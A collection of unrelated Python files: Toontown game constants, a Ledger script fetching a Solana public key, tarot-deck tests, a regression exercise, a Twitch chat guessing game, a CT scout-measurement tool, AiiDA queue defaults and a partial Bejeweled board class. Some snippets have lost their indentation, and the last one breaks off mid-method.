factoryId2factoryType = {MockupFactoryId: FT_FullSuit, SellbotFactoryInt: FT_FullSuit, LawbotOfficeInt: FT_FullSuit}
StreetNames = TTLocalizer.GlobalStreetNames
StreetBranchZones = StreetNames.keys()
Hoods = (
DonaldsDock, ToontownCentral, TheBrrrgh, MinniesMelodyland, DaisyGardens, ConstructionZone, FunnyFarm, GoofySpeedway, DonaldsDreamland, BossbotHQ, SellbotHQ, CashbotHQ, LawbotHQ)
NoPreviousGameId = 0
RaceGameId = 1
CannonGameId = 2
TagGameId = 3
PatternGameId = 4
RingGameId = 5
MazeGameId = 6
TugOfWarGameId = 7
CatchGameId = 8
DivingGameId = 9
TargetGameId = 10
PairingGameId = 11
VineGameId = 12
TravelGameId = 100
MinigameNames = {'race': RaceGameId, 'cannon': CannonGameId, 'tag': TagGameId, 'pattern': PatternGameId, 'minnie': PatternGameId, 'match': PatternGameId, 'matching': PatternGameId, 'ring': RingGameId, 'maze': MazeGameId, 'tug': TugOfWarGameId, 'catch': CatchGameId, 'diving': DivingGameId, 'target': TargetGameId, 'pairing': PairingGameId, 'vine': VineGameId, 'travel': TravelGameId}
MinigameTemplateId = -1
MinigameIDs = (
RaceGameId, CannonGameId, TagGameId, PatternGameId, RingGameId, MazeGameId, TugOfWarGameId, CatchGameId, DivingGameId, TargetGameId, PairingGameId, VineGameId, TravelGameId)
MinigamePlayerMatrix = {1: (CannonGameId, RingGameId, MazeGameId, TugOfWarGameId, CatchGameId, DivingGameId, TargetGameId, PairingGameId, VineGameId), 2: (CannonGameId, PatternGameId, RingGameId, TagGameId, MazeGameId, TugOfWarGameId, CatchGameId, DivingGameId, TargetGameId, PairingGameId, VineGameId), 3: (CannonGameId, PatternGameId, RingGameId, TagGameId, RaceGameId, MazeGameId, TugOfWarGameId, CatchGameId, DivingGameId, TargetGameId, PairingGameId, VineGameId), 4: (CannonGameId, PatternGameId, RingGameId, TagGameId, RaceGameId, MazeGameId, TugOfWarGameId, CatchGameId, DivingGameId, TargetGameId, PairingGameId, VineGameId)}
KeyboardTimeout = 300
phaseMap = {Tutorial: 4, ToontownCentral: 4, MyEstate: 5.5, DonaldsDock: 6, MinniesMelodyland: 6, GoofySpeedway: 6, TheBrrrgh: 8, DaisyGardens: 8, FunnyFarm: 8, DonaldsDreamland: 8, ConstructionZone: 8, BossbotHQ: 9, SellbotHQ: 9, CashbotHQ: 10, LawbotHQ: 11}
streetPhaseMap = {ToontownCentral: 5, DonaldsDock: 6, MinniesMelodyland: 6, GoofySpeedway: 6, TheBrrrgh: 8, DaisyGardens: 8, FunnyFarm: 8, DonaldsDreamland: 8, ConstructionZone: 8, BossbotHQ: 9, SellbotHQ: 9, CashbotHQ: 10, LawbotHQ: 11}
dnaMap = {Tutorial: 'toontown_central', ToontownCentral: 'toontown_central', DonaldsDock: 'donalds_dock', MinniesMelodyland: 'minnies_melody_land', GoofySpeedway: 'goofy_speedway', TheBrrrgh: 'the_burrrgh', DaisyGardens: 'daisys_garden', FunnyFarm: 'not done yet', DonaldsDreamland: 'donalds_dreamland', ConstructionZone: 'not done yet', BossbotHQ: 'cog_hq_bossbot', SellbotHQ: 'cog_hq_sellbot', CashbotHQ: 'cog_hq_cashbot', LawbotHQ: 'cog_hq_lawbot'}
hoodNameMap = {DonaldsDock: TTLocalizer.DonaldsDock, ToontownCentral: TTLocalizer.ToontownCentral, TheBrrrgh: TTLocalizer.TheBrrrgh, MinniesMelodyland: TTLocalizer.MinniesMelodyland, DaisyGardens: TTLocalizer.DaisyGardens, ConstructionZone: TTLocalizer.ConstructionZone, FunnyFarm: TTLocalizer.FunnyFarm, GoofySpeedway: TTLocalizer.GoofySpeedway, DonaldsDreamland: TTLocalizer.DonaldsDreamland, BossbotHQ: TTLocalizer.BossbotHQ, SellbotHQ: TTLocalizer.SellbotHQ, CashbotHQ: TTLocalizer.CashbotHQ, LawbotHQ: TTLocalizer.LawbotHQ, Tutorial: TTLocalizer.Tutorial, MyEstate: TTLocalizer.MyEstate}
safeZoneCountMap = {MyEstate: 8, Tutorial: 6, ToontownCentral: 6, DonaldsDock: 10, MinniesMelodyland: 5, GoofySpeedway: 500, TheBrrrgh: 8, DaisyGardens: 9, FunnyFarm: 500, DonaldsDreamland: 5, ConstructionZone: 500}
townCountMap = {MyEstate: 8, Tutorial: 40, ToontownCentral: 37, DonaldsDock: 40, MinniesMelodyland: 40, GoofySpeedway: 40, TheBrrrgh: 40, DaisyGardens: 40, FunnyFarm: 40, DonaldsDreamland: 40, ConstructionZone: 40}
hoodCountMap = {MyEstate: 2, Tutorial: 2, ToontownCentral: 2, DonaldsDock: 2, MinniesMelodyland: 2, GoofySpeedway: 2, TheBrrrgh: 2, DaisyGardens: 2, FunnyFarm: 2, DonaldsDreamland: 2, ConstructionZone: 2, BossbotHQ: 2, SellbotHQ: 43, CashbotHQ: 2, LawbotHQ: 2}
TrophyStarLevels = (
10, 20, 30, 50, 75, 100)
TrophyStarColors = (
Vec4(0.9, 0.6, 0.2, 1), Vec4(0.9, 0.6, 0.2, 1), Vec4(0.8, 0.8, 0.8, 1), Vec4(0.8, 0.8, 0.8, 1), Vec4(1, 1, 0, 1), Vec4(1, 1, 0, 1))
MickeySpeed = 5.0
MinnieSpeed = 3.2
DonaldSpeed = 3.68
DaisySpeed = 2.3
GoofySpeed = 5.2
PlutoSpeed = 5.5
SuitWalkSpeed = 4.8
PieCodeBossCog = 1
PieCodeNotBossCog = 2
PieCodeToon = 3
PieCodeBossInsides = 4
PieCodeDefensePan = 5
PieCodeProsecutionPan = 6
PieCodeLawyer = 7
PieCodeColors = {PieCodeBossCog: None, PieCodeNotBossCog: (0.8, 0.8, 0.8, 1), PieCodeToon: None}
BossCogRollSpeed = 7.5
BossCogTurnSpeed = 20
BossCogTreadSpeed = 3.5
BossCogDizzy = 0
BossCogElectricFence = 1
BossCogSwatLeft = 2
BossCogSwatRight = 3
BossCogAreaAttack = 4
BossCogFrontAttack = 5
BossCogRecoverDizzyAttack = 6
BossCogDirectedAttack = 7
BossCogStrafeAttack = 8
BossCogNoAttack = 9
BossCogGoonZap = 10
BossCogSlowDirectedAttack = 11
BossCogDizzyNow = 12
BossCogGavelStomp = 13
BossCogGavelHandle = 14
BossCogLawyerAttack = 15
BossCogAttackTimes = {BossCogElectricFence: 0, BossCogSwatLeft: 5.5, BossCogSwatRight: 5.5, BossCogAreaAttack: 4.21, BossCogFrontAttack: 2.65, BossCogRecoverDizzyAttack: 5.1, BossCogDirectedAttack: 4.84, BossCogNoAttack: 6, BossCogSlowDirectedAttack: 7.84}
BossCogDamageLevels = {BossCogElectricFence: 1, BossCogSwatLeft: 5, BossCogSwatRight: 5, BossCogAreaAttack: 10, BossCogFrontAttack: 3, BossCogRecoverDizzyAttack: 3, BossCogDirectedAttack: 3, BossCogStrafeAttack: 2, BossCogGoonZap: 5, BossCogSlowDirectedAttack: 10, BossCogGavelStomp: 20, BossCogGavelHandle: 2, BossCogLawyerAttack: 5}
BossCogBattleAPosHpr = (
0, -25, 0, 0, 0, 0)
BossCogBattleBPosHpr = (0, 25, 0, 180, 0, 0)
SellbotBossMaxDamage = 100
SellbotBossBattleOnePosHpr = (
0, -35, 0, -90, 0, 0)
SellbotBossBattleTwoPosHpr = (0, 60, 18, -90, 0, 0)
SellbotBossBattleThreeHpr = (180, 0, 0)
SellbotBossBottomPos = (0, -110, -6.5)
SellbotBossDeathPos = (0, -175, -6.5)
SellbotBossDooberTurnPosA = (
-20, -50, 0)
SellbotBossDooberTurnPosB = (20, -50, 0)
SellbotBossDooberTurnPosDown = (0, -50, 0)
SellbotBossDooberFlyPos = (0, -135, -6.5)
SellbotBossTopRampPosA = (
-80, -35, 18)
SellbotBossTopRampTurnPosA = (-80, 10, 18)
SellbotBossP3PosA = (-50, 40, 18)
SellbotBossTopRampPosB = (80, -35, 18)
SellbotBossTopRampTurnPosB = (80, 10, 18)
SellbotBossP3PosB = (50, 60, 18)
CashbotBossMaxDamage = 500
CashbotBossOffstagePosHpr = (
120, -195, 0, 0, 0, 0)
CashbotBossBattleOnePosHpr = (120, -230, 0, 90, 0, 0)
CashbotRTBattleOneStartPosHpr = (94, -220, 0, 110, 0, 0)
CashbotBossBattleThreePosHpr = (120, -315, 0, 180, 0, 0)
CashbotToonsBattleThreeStartPosHpr = [
(
105, -285, 0, 208, 0, 0), (136, -342, 0, 398, 0, 0), (105, -342, 0, 333, 0, 0), (135, -292, 0, 146, 0, 0), (93, -303, 0, 242, 0, 0), (144, -327, 0, 64, 0, 0), (145, -302, 0, 117, 0, 0), (93, -327, 0, -65, 0, 0)]
CashbotBossSafePosHprs = [
(
120, -315, 30, 0, 0, 0), (77.2, -329.3, 0, -90, 0, 0), (77.1, -302.7, 0, -90, 0, 0), (165.7, -326.4, 0, 90, 0, 0), (165.5, -302.4, 0, 90, 0, 0), (107.8, -359.1, 0, 0, 0, 0), (133.9, -359.1, 0, 0, 0, 0), (107.0, -274.7, 0, 180, 0, 0), (134.2, -274.7, 0, 180, 0, 0)]
CashbotBossCranePosHprs = [
(
97.4, -337.6, 0, -45, 0, 0), (97.4, -292.4, 0, -135, 0, 0), (142.6, -292.4, 0, 135, 0, 0), (142.6, -337.6, 0, 45, 0, 0)]
CashbotBossToMagnetTime = 0.2
CashbotBossFromMagnetTime = 1
CashbotBossSafeKnockImpact = 0.5
CashbotBossSafeNewImpact = 0.0
CashbotBossGoonImpact = 0.1
CashbotBossKnockoutDamage = 15
TTWakeWaterHeight = -4.79
DDWakeWaterHeight = 1.669
EstateWakeWaterHeight = -0.3
WakeRunDelta = 0.1
WakeWalkDelta = 0.2
NoItems = 0
NewItems = 1
OldItems = 2
SuitInvasionBegin = 0
SuitInvasionUpdate = 1
SuitInvasionEnd = 2
SuitInvasionBulletin = 3
NO_HOLIDAY = 0
JULY4_FIREWORKS = 1
NEWYEARS_FIREWORKS = 2
HALLOWEEN = 3
WINTER_DECORATIONS = 4
SKELECOG_INVASION = 5
MR_HOLLYWOOD_INVASION = 6
FISH_BINGO_NIGHT = 7
ELECTION_PROMOTION = 8
BLACK_CAT_DAY = 9
RESISTANCE_EVENT = 10
KART_RECORD_DAILY_RESET = 11
KART_RECORD_WEEKLY_RESET = 12
TRICK_OR_TREAT = 13
CIRCUIT_RACING = 14
POLAR_PLACE_EVENT = 15
CIRCUIT_RACING_EVENT = 16
TROLLEY_HOLIDAY = 17
TROLLEY_WEEKEND = 18
JULY22_FIREWORKS = 201
JULY23_FIREWORKS = 202
JULY25_FIREWORKS = 203
JULY30_FIREWORKS = 204
JULY31_FIREWORKS = 205
AUGUST1_FIREWORKS = 206
AUGUST3_FIREWORKS = 207
AUGUST5_FIREWORKS = 208
AUGUST7_FIREWORKS = 209
AUGUST8_FIREWORKS = 210
AUGUST10_FIREWORKS = 211
AUGUST13_FIREWORKS = 212
AUGUST14_FIREWORKS = 213
AUGUST16_FIREWORKS = 214
AUGUST31_FIREWORKS = 215
OCTOBER31_FIREWORKS = 31
NOVEMBER19_FIREWORKS = 32
FEBRUARY14_FIREWORKS = 51
JULY14_FIREWORKS = 52
JUNE22_FIREWORKS = 53
BIGWIG_INVASION = 54
TOT_REWARD_JELLYBEAN_AMOUNT = 100
TOT_REWARD_END_OFFSET_AMOUNT = 0
LawbotBossMaxDamage = 2700
LawbotBossWinningTilt = 40
LawbotBossInitialDamage = 1350
LawbotBossBattleOnePosHpr = (
-2.798, -60, 0, 0, 0, 0)
LawbotBossBattleTwoPosHpr = (
-2.798, 89, 19.145, 0, 0, 0)
LawbotBossTopRampPosA = (
-80, -35, 18)
LawbotBossTopRampTurnPosA = (-80, 10, 18)
LawbotBossP3PosA = (
55, -9, 0)
LawbotBossTopRampPosB = (80, -35, 18)
LawbotBossTopRampTurnPosB = (80, 10, 18)
LawbotBossP3PosB = (
55, -9, 0)
LawbotBossBattleThreePosHpr = LawbotBossBattleTwoPosHpr
LawbotBossBottomPos = (
50, 39, 0)
LawbotBossDeathPos = (50, 40, 0)
LawbotBossGavelPosHprs = [
(
35, 78.328, 0, -135, 0, 0), (68.5, 78.328, 0, 135, 0, 0), (47, -33, 0, 45, 0, 0), (-50, -39, 0, -45, 0, 0), (-9, -37, 0, 0, 0, 0), (-9, 49, 0, -180, 0, 0), (32, 0, 0, 45, 0, 0), (33, 56, 0, 135, 0, 0)]
LawbotBossGavelTimes = [
(
0.2, 0.9, 0.6), (0.25, 1, 0.5), (1.0, 6, 0.5), (0.3, 3, 1), (0.26, 0.9, 0.45), (0.24, 1.1, 0.65), (0.27, 1.2, 0.45), (0.25, 0.95, 0.5)]
LawbotBossGavelHeadings = [
(
0, -15, 4, -70 - 45, 5, 45), (0, -45, -4, -35, -45, -16, 32), (0, -8, 19, -7, 5, 23), (0, -4, 8, -16, 32, -45, 7, 7, -30, 19, -13, 25), (0, -45, -90, 45, 90), (0, -45, -90, 45, 90), (0, -45, 45), (0, -45, 45)]
LawbotBossCogRelBattleAPosHpr = (
-25, -10, 0, 0, 0, 0)
LawbotBossCogRelBattleBPosHpr = (-25, 10, 0, 0, 0, 0)
LawbotBossCogAbsBattleAPosHpr = (
-5, -2, 0, 0, 0, 0)
LawbotBossCogAbsBattleBPosHpr = (-5, 0, 0, 0, 0, 0)
LawbotBossWitnessStandPosHpr = (
54, 100, 0, -90, 0, 0)
LawbotBossInjusticePosHpr = (
-3, 12, 0, 90, 0, 0)
LawbotBossInjusticeScale = (1.75, 1.75, 1.5)
LawbotBossDefensePanDamage = 1
LawbotBossLawyerPosHprs = [
(
-57, -24, 0, -90, 0, 0), (-57, -12, 0, -90, 0, 0), (-57, 0, 0, -90, 0, 0), (-57, 12, 0, -90, 0, 0), (-57, 24, 0, -90, 0, 0), (-57, 36, 0, -90, 0, 0), (-57, 48, 0, -90, 0, 0), (-57, 60, 0, -90, 0, 0), (-3, -37.3, 0, 0, 0, 0), (-3, 53, 0, -180, 0, 0)]
LawbotBossLawyerCycleTime = 6
LawbotBossLawyerToPanTime = 2.5
LawbotBossLawyerChanceToAttack = 50
LawbotBossLawyerHeal = 2
LawbotBossLawyerStunTime = 5
LawbotBossDifficultySettings = [
(
38, 4, 8, 1, 0, 0), (36, 5, 8, 1, 0, 0), (34, 5, 8, 1, 0, 0), (32, 6, 8, 2, 0, 0), (30, 6, 8, 2, 0, 0), (28, 7, 8, 3, 0, 0), (26, 7, 9, 3, 1, 1), (24, 8, 9, 4, 1, 1), (22, 8, 10, 4, 1, 0)]
LawbotBossCannonPosHprs = [
(
-40, -12, 0, -90, 0, 0), (-40, 0, 0, -90, 0, 0), (-40, 12, 0, -90, 0, 0), (-40, 24, 0, -90, 0, 0), (-40, 36, 0, -90, 0, 0), (-40, 48, 0, -90, 0, 0), (-40, 60, 0, -90, 0, 0), (-40, 72, 0, -90, 0, 0)]
LawbotBossCannonPosA = (
-80, -51.48, 0)
LawbotBossCannonPosB = (-80, 70.73, 0)
LawbotBossChairPosHprs = [
(
60, 72, 0, -90, 0, 0), (60, 62, 0, -90, 0, 0), (60, 52, 0, -90, 0, 0), (60, 42, 0, -90, 0, 0), (60, 32, 0, -90, 0, 0), (60, 22, 0, -90, 0, 0), (70, 72, 5, -90, 0, 0), (70, 62, 5, -90, 0, 0), (70, 52, 5, -90, 0, 0), (70, 42, 5, -90, 0, 0), (70, 32, 5, -90, 0, 0), (70, 22, 5, -90, 0, 0)]
LawbotBossChairRow1PosB = (
59.3, 48, 14.05)
LawbotBossChairRow1PosA = (59.3, -18.2, 14.05)
LawbotBossChairRow2PosB = (75.1, 48, 28.2)
LawbotBossChairRow2PosA = (75.1, -18.2, 28.2)
LawbotBossCannonBallMax = 12
LawbotBossJuryBoxStartPos = (
94, -8, 5)
LawbotBossJuryBoxRelativeEndPos = (30, 0, 12.645)
LawbotBossJuryBoxMoveTime = 70
LawbotBossJurorsForBalancedScale = 8
LawbotBossDamagePerJuror = 68
LawbotBossCogJurorFlightTime = 10
LawbotBossCogJurorDistance = 75
LawbotBossBaseJurorNpcId = 2001
LawbotBossWitnessEpiloguePosHpr = (
-3, 0, 0, 180, 0, 0)
LawbotBossChanceForTaunt = 25
LawbotBossBonusWaitTime = 60
LawbotBossBonusDuration = 20
LawbotBossBonusToonup = 10
LawbotBossBonusWeightMultiplier = 2
LawbotBossChanceToDoAreaAttack = 11
LOW_POP_NTT = 0
MID_POP_NTT = 100
HIGH_POP_NTT = 200
LOW_POP = 399
MID_POP = 499
HIGH_POP = -1
PinballCannonBumper = 0
PinballCloudBumperLow = 1
PinballCloudBumperMed = 2
PinballCloudBumperHigh = 3
PinballTarget = 4
PinballRoof = 5
PinballHouse = 6
PinballFence = 7
PinballBridge = 8
PinballStatuary = 9
PinballScoring = [
(
100, 1), (150, 1), (200, 1), (250, 1), (350, 1), (100, 1), (50, 1), (25, 1), (100, 1), (10, 1)]
PinballCannonBumperInitialPos = (
0, -20, 40)
RentalCop = 0
RentalCannon = 1
GlitchKillerZones = [
13300, 13400, 13500, 13600]
ColorPlayer = (
0.3, 0.7, 0.3, 1)
ColorAvatar = (0.3, 0.3, 0.7, 1)
ColorPet = (0.6, 0.4, 0.2, 1)
ColorFreeChat = (
0.3, 0.3, 0.8, 1)
ColorSpeedChat = (0.2, 0.6, 0.4, 1)
ColorNoChat = (0.8, 0.5, 0.1, 1) |
import random
names = ['Ethan', 'Kurt', 'Eric']
random.shuffle(names)
print(names)
|
#!/usr/bin/env python
from ledgerblue.comm import getDongle
import argparse
from binascii import unhexlify
import base58
parser = argparse.ArgumentParser()
parser.add_argument('--account_number', help="BIP32 account to retrieve. e.g. \"12345\".")
args = parser.parse_args()
if args.account_number == None:
args.account_number = "12345"
derivation_path = [44, 501, int(args.account_number)]
derivation_path_hex = '{:02x}'.format(len(derivation_path)) + "".join('{:02x}'.format(x | 0x80000000) for x in derivation_path)
# Create APDU message.
# CLA 0xE0
# INS 0x02 GET_PUBKEY
# P1 0x00 NO USER CONFIRMATION REQUIRED (0x01 otherwise)
# P2 0x00 UNUSED
payload_hex = derivation_path_hex
adpu_hex = "E0020000" + '{:02x}'.format(len(payload_hex) / 2) + payload_hex
adpu_bytes = bytearray.fromhex(adpu_hex)
print("~~ Ledger Solana ~~")
print("Request Pubkey")
dongle = getDongle(True)
result = dongle.exchange(adpu_bytes)[0:32]
print("Pubkey received: " + base58.b58encode(bytes(result)))
|
from copy import deepcopy
import tarotbot.cards as cards
import pytest
new_deck = lambda: deepcopy(cards.Deck(cards.tarot_deck))
#def test_deck_draw_returns_card():
# assert type(deepcopy(cards.Deck(cards.tarot_deck)).draw()) == cards.Card
def test_deck_draw_exhausts_deck():
deck = deepcopy(cards.Deck(cards.tarot_deck))
with pytest.raises(IndexError):
for c in range(79):
deck.draw()
def test_return_returns_card():
deck = deepcopy(cards.Deck(cards.tarot_deck))
d_card = deck.draw()[0]
assert not d_card in deck.curr_deck
deck.return_card(0)
assert d_card in deck.curr_deck
def test_draw_can_draw_several_cards():
deck = new_deck()
d_cards = deck.draw(3)
assert len(d_cards) == 3
assert type(d_cards[0]) == cards.Card
def test_list_discards():
deck = new_deck()
d_cards = deck.draw(3)
assert len(deck.discards) == 3
assert type(deck.discards[0]) == cards.Card
assert d_cards[0] in deck.discards
def test_remaining():
deck = new_deck()
deck.draw(3)
assert deck.remaining() == 75 |
'''
We will assume that fertility is a linear function of the female illiteracy rate. That is, f=ai+b, where a is the slope and b
is the intercept. We can think of the intercept as the minimal fertility rate, probably somewhere between one and two. The slope tells us how the fertility rate varies with illiteracy. We can find the best fit line using np.polyfit().
Plot the data and the best fit line. Print out the slope and intercept. (Think: what are their units?)
'''
# Plot the illiteracy rate versus fertility
_ = plt.plot(illiteracy, fertility, marker='.', linestyle='none')
plt.margins(0.02)
_ = plt.xlabel('percent illiterate')
_ = plt.ylabel('fertility')
# Perform a linear regression using np.polyfit(): a, b
a, b = np.polyfit(illiteracy, fertility, 1)
# Print the results to the screen
print('slope =', a, 'children per woman / percent illiterate')
print('intercept =', b, 'children per woman')
# Make theoretical line to plot
x = np.array([0, 100])
y = a * x + b
# Add regression line to your plot
_ = plt.plot(x, y)
# Draw the plot
plt.show()
|
"""Commands: "!kstart", "!kstop"."""
import random
from bot.commands.command import Command
from bot.utilities.permission import Permission
from bot.utilities.startgame import startGame
class KappaGame(Command):
"""Play the Kappa game.
This game consists of guessing a random amount of Kappas.
"""
perm = Permission.User
def __init__(self, bot):
"""Initialize variables."""
self.responses = {}
self.active = False
self.n = 0
self.answered = []
def match(self, bot, user, msg, tag_info):
"""Match if the game is active or gets started with !kstart by a user who pays 5 points."""
return self.active or startGame(bot, user, msg, "!kstart")
def run(self, bot, user, msg, tag_info):
"""Generate a random number n when game gets first started. Afterwards, check if a message contains the emote n times."""
self.responses = bot.responses["KappaGame"]
cmd = msg.strip()
if not self.active:
self.active = True
self.n = random.randint(1, 25)
self.answered = []
print("Kappas: " + str(self.n))
bot.write(self.responses["start_msg"]["msg"])
else:
if msg == "!kstop" and bot.get_permission(user) not in [Permission.User, Permission.Subscriber]:
self.close(bot)
bot.write(self.responses["stop_msg"]["msg"])
return
i = self.countEmotes(cmd, "Kappa")
if i == self.n:
var = {"<USER>": bot.displayName(user), "<AMOUNT>": self.n}
bot.write(bot.replace_vars(self.responses["winner_msg"]["msg"], var))
bot.ranking.incrementPoints(user, bot.KAPPAGAMEP, bot)
bot.gameRunning = False
self.active = False
self.answered = []
elif i != -1:
if i not in self.answered:
var = {"<AMOUNT>": i}
bot.write(bot.replace_vars(self.responses["wrong_amount"]["msg"], var))
self.answered.append(i)
def countEmotes(self, msg, emote):
"""Count the number of emotes in a message."""
msg = msg.strip()
arr = msg.split(' ')
for e in arr:
if e != emote:
return -1
return len(arr)
def close(self, bot):
"""Close kappa game."""
self.answered = []
self.active = False
bot.gameRunning = False
|
import click
from diana.apis import DcmDir
from diana.dixel import DixelView
from diana.plus import measure_scout # monkey patches Dixel
epilog = """
Basic algorithm is to use a 2-element Guassian mixture model to find a threshold
that separates air from tissue across breadth of the image. Known to fail when
patients do not fit in the scout field of view.
Returns image orientation and estimated distance in centimeters. These measurements
can be converted into equivalent water volumes using AAPM-published tables.
\b
$ diana-plus ssde tests/resources/scouts ct_scout_01.dcm ct_scout_02.dcm
Measuring scout images
------------------------
ct_scout_01.dcm (AP): 28.0cm
ct_scout_02.dcm (LATERAL): 43.0cm
"""
@click.command(short_help="Estimate patient size from localizer", epilog=epilog)
@click.argument('path', type=click.Path(exists=True))
@click.argument('images', nargs=-1)
def ssde(path, images):
"""Estimate patient dimensions from CT-localizer IMAGES for size-specific dose estimation."""
click.echo(click.style('Measuring scout images', underline=True, bold=True))
D = DcmDir(path=path)
for image in images:
d = D.get(image, view=DixelView.PIXELS)
result = d.measure_scout()
click.echo("{} ({}): {}cm".format(image, result[0], round(result[1])))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
In this file/module, YOU, the user can specify some default resource values for
queues of different computers
This might be really useful for high-throughput calculation.
You can modefy, adjudst this file to your needs
"""
# TODO: move computers dict somewhere else?
# TODO find AiiDA solution for this
def queue_defaults(queue_name, computer=None):
"""
In this class you specify defaults methods which you can use for workflows
or normal calculations.
"""
'''
code = Code.get_from_string(codename)
code2 = Code.get_from_string(codename2)
computer = Computer.get(computer_n
ame)
'''
queue_resources = None
print queue_name
computers = {
'iff003':
{'th1' : { 'resources' : {"num_machines": 1, "num_mpiprocs_per_machine" : 12}, 'walltime_sec' : 30 * 60 },
'th1_small' : { 'resources' : {"num_machines": 1, "num_mpiprocs_per_machine" : 12}, 'walltime_sec' : 20 * 60 }}
}
if computer:
#print 'computer'
c_name = computer
queue = computers.get(c_name, {}).get(queue_name, {})
res = queue.get('resources', None)
wt = queue.get('walltime_sec', None)
else:
#print 'no computer'
c_name = None
res = None
wt = None
for comp in computers.keys():
queue = computers.get(comp, {}).get(queue_name, {})
#print 'queue {}'.format(queue)
if queue:
res = queue.get('resources', None)
wt = queue.get('walltime_sec', None)
queue_resources = {'resources' : res, 'walltime_sec' : wt }
#print queue_resources
return queue_resources
|
#__author__ = 'Tom Schaul, [email protected]'
import random
import copy
import numpy as np
from scipy import zeros
from pprint import pformat, pprint
#from pybrain.utilities import Named
#from pybrain.rl.environments.environment import Environment
# TODO: mazes can have any number of dimensions?
BOARDWIDTH = 8
BOARDHEIGHT = 8
NUMGEMTYPES = 5
assert NUMGEMTYPES >= 5, "numgemtypes > 5, for unique gem drop rule"
GEMTYPES = range(NUMGEMTYPES)
EMPTY_SPACE = -1
ROWABOVEBOARD = 'row above board'
MAX_ITERS = 100
pos = 0
got = 0
opti = 0
# constants for direction values (used for pygame animations)
UP = 'up'
DOWN = 'down'
LEFT = 'left'
RIGHT = 'right'
class BejeweledBoard():
""" 2D mazes, with actions being the direction of movement (N,E,S,W)
and observations being the presence of walls in those directions.
It has a finite number of states, a subset of which are potential starting states (default: all except goal states).
A maze can have absorbing states, which, when reached end the episode (default: there is one, the goal).
There is a single agent walking around in the maze (Theseus).
The movement can succeed or not, or be stochastically determined.
Running against a wall does not get you anywhere.
Every state can have an an associated reward (default: 1 on goal, 0 elsewhere).
The observations can be noisy.
"""
board = None
score = 0
gameover = False
def __init__(self, boardsize, numgemtypes, animspeed, **args):
global NUMGEMTYPES, GEMTYPES
assert numgemtypes >= 5, "numgemtypes > 5, for unique gem drop rule"
NUMGEMTYPES = numgemtypes
GEMTYPES = range(NUMGEMTYPES)
#self.setArgs(**args)
self.reset()
def reset(self):
""" return to initial position (stochastically): """
self.board = self._getBlankBoard()
self._fillBoard(self.board)
while not self._canMakeMove(self.board):
self.board = self._getBlankBoard()
self._fillBoard(self.board)
self.score = 0
self.gameover = False
def _score(self, match, inboard):
score = 0
board = copy.deepcopy(inboard)
firstSelectedGem = {'x': match[0][0], 'y': match[0][1]}
clickedSpace = {'x': match[1][0], 'y': match[1][1]}
# Two gems have been clicked on and selected. Swap the gems.
firstSwappingGem, secondSwappingGem = self._getSwappingGems(board, firstSelectedGem, clickedSpace)
# Swap the gems in the board data structure.
board[firstSwappingGem['x']][firstSwappingGem['y']] = secondSwappingGem['imageNum']
board[secondSwappingGem['x']][secondSwappingGem['y']] = firstSwappingGem['imageNum']
matchedGems = self._findMatchingGems(board)
# This was a matching move.
while matchedGems != []:
# Remove matched gems, then pull down the board.
points = []
for gemSet in matchedGems:
score += (10 + (len(gemSet) - 3) * 10)
for gem in gemSet:
board[gem[0]][gem[1]] = EMPTY_SPACE
# Drop the new gems.
self._fillBoard(board)
# Check if there are any new matches.
matchedGems = self._findMatchingGems(board)
return score
def _findOptimalMoves(self, board):
matches = self._possibleMoves(board)
scores = [self._score(match, board) for match in matches]
tup = zip(matches, scores)
maxVal = max(scores)
maxMoves = filter(lambda x: x[1] == maxVal, tup)
return [x[0] for x in maxMoves], maxVal
def performAction(self, action):
movePos = self._canMakeMove(self.board)
#optiMoves, optiValue = self._findOptimalMoves(self.board)
scoreAdd = 0
#action = self._actionIndexToSwapTuple(action)
firstSelectedGem = {'x': action[0][0], 'y': action[0][1]}
clickedSpace = {'x': action[1][0], 'y': action[1][1]}
# Two gems have been clicked on and selected. Swap the gems.
firstSwappingGem, secondSwappingGem = self._getSwappingGems(self.board, firstSelectedGem, clickedSpace)
if firstSwappingGem == None and secondSwappingGem == None:
# If both are None, then the gems were not adjacent
print ('gems not adjacent')
firstSelectedGem = None # deselect the first gem
self.lastReward = -10
return 0
# Swap the gems in the board data structure.
self.board[firstSwappingGem['x']][firstSwappingGem['y']] = secondSwappingGem['imageNum']
self.board[secondSwappingGem['x']][secondSwappingGem['y']] = firstSwappingGem['imageNum']
# See if this is a matching move.
matchedGems = self._findMatchingGems(self.board)
if matchedGems == []:
#print 'did not cause a match'
# Was not a matching move; swap the gems back
self.board[firstSwappingGem['x']][firstSwappingGem['y']] = firstSwappingGem['imageNum']
self.board[secondSwappingGem['x']][secondSwappingGem['y']] = secondSwappingGem['imageNum']
self.lastReward = -10
else:
# This was a matching move.
while matchedGems != []:
# Remove matched gems, then pull down the board.
for gemSet in matchedGems:
scoreAdd += (10 + (len(gemSet) - 3) * 10)
for gem in gemSet:
self.board[gem[0]][gem[1]] = EMPTY_SPACE
self.score += scoreAdd
# Drop the new gems.
self._fillBoard(self.board)
# Check if there are any new matches.
matchedGems = self._findMatchingGems(self.board)
# TODO: set last reward before combos? otherwise it will get confused
# when it gets extra reward
# combos allowed from pieces already on the board falling into
# more matches, but not allowed for pieces newly falling into board
self.lastReward = scoreAdd
firstSelectedGem = None
global pos
global got
global opti
if movePos:
pos += 1
if scoreAdd > 0:
got += 1
#if list([action[0], action[1]]) in optiMoves:
# opti += 1
#print ('found match:', got, '/', pos, '=', \
# float(got) / pos, 'found optimal:', \
# opti, '/', pos, '=', float(opti) / pos
if not self._canMakeMove(self.board):
#print 'game ended, no more moves available'
self.gameover = True
# TODO: tie gameover into episodic learning stuff?
self.reset()
return 0
def getSensors(self):
indices = self._boardToIndices(self.board)
return indices
def getLastReward(self):
return self.lastReward
# ====================================================================
# ==================== BEJEWELED HELPER FUNCTIONS ====================
# ====================================================================
# TODO: add rotation/mirroring support
def _actionIndexToSwapTuple(self, action):
""" Converts from action index to tuple of coords of gems to swap """
# TODO: explain indexing scheme better
action = int(action[0]) # remove action number from its array
swapTuple = []
if action > 11: # vertical swap
swapTuple.append(divmod(action - 12, 4))
swapTuple.append((swapTuple[0][0] + 1, swapTuple[0][1]))
else: # horizontal swap
swapTuple.append(divmod(action, 3))
swapTuple.append((swapTuple[0][0], swapTuple[0][1] + 1))
return tuple(swapTuple)
def _boardToIndices(self, board):
""" Converts board to state index for each color (EXPLAIN MORE)
Also: ROTATIONS/REFLECTIONS? """
# TODO: explain indexing scheme better
b = np.array(board)
